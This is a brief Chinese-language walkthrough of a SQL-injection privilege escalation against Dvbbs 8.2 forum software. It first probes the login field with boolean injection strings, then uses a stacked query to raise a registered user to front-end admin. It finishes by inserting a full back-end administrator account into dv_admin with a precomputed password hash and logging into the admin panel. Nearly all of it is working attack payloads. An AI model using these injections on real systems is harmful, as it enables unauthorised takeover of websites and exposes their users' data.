过滤不足的提权

（动态论坛8.2）

---

先注册一个账户

然后退出账户登陆，在登陆框尝试注入（1）登录：san’ and ‘a’=’a 密码：1234567 （2）登录：san’ and ‘a’=’b,密码：1234567

提示错误，注入生效，再次注入';update dv_user set usergroupid=1 where username='san'--

(进行提权）

注入完成后，登陆刚开始注册的账号，从管理权限可以看出已经是前台管理权限了

---

再次推出登陆，

使用以下语句登录，密码为正确密码：san';insert into dv_admin (username,password,flag,adduser) values('san','49ba59abbe56e057','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','san')--【注意：49ba59abbe56e057是123456的cmd16位密文

---

打卡管理员网址xxx.xx.xx.x/admin

用注册的账户进行登陆，发现成功提权后台管理